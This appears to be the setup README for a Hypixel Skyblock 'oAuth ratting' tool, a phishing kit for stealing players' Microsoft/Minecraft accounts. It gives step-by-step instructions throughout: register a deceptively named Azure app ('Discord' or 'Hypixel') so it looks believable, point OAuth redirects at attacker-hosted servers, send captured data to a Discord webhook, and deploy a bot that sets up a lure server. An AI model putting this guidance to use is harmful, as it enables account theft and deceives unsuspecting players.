Hypixel Skyblock oAuth ratting made easy
First, you need to set a discord webhook in the "config.json" file Next, set a Hypixel api key in the config as well.
at this point, it should look something like this:
"networth": {
"apiKey": "9f96947b-82ce-4337-9667f-7d4fd7bbi35473"
"URLS": {
"redirect_uri": "",
"apiURL": ""
"webhook": {
"webhookURL": "https://discord.com/api/webhooks/xxxxx"
"discord": {
"bot_token": ""
"azure" : {
"client_id": "",
"client_secret": "",
"redirect_uri": ""
npm install axios
npm install skyhelper-networth
npm install body-parser
npm install express
npm install iplim
pip install py-cord
Contrary to popular belief, this is actually very easy!
First, visit Microsoft Azure's website. You might have to create an account I forgot
Next, at the search top bar, search for "App registrations"
Then, click "New registration" in the top left corner
Next, type any name you want. To make it believable, you can choose something like "Discord" or "Hypixel"
Now, we'll come back to this later.
If you want to host it on a vps, you can use DigitalOcean and get a free 200$ of credit for 2 months for only paying 5$
You can also use OnRender, it's free and just like heroku but with super slow upload times but it works perfectly fine
Once you have your OnRender link, go back to App Registration.
Now, set the redirect uri to your onrender link or your vps if it applies to you. Then set the platform to web.
Reopen config.json and set the client_id to the Application (client) ID on the Azure page.
Then, back on Azure, click "Add a certificate or secret" under Client credentials.
Click "New client secret", the name can be anything you want. It doesn't matter.
Then, click add and copy the Secret ID and set that to client_secret in the config.
Set the redirect uri you put to the azure as redirect_uri in config
If you want to use the NachtAuth Dashboard, make a new OnRender application and upload the "api" folder to there.
Once you get the url for your new OnRender app, set it to the apiURL in config.json, also add it to like 44 (leave the /api) in page/script.js because i forgot to change it and am not going to
Your URL should look like this:
Make a discord bot and set the token as bot token in config.json
Start the bot and do /setup <oauth link>
and watch it set up the server for you!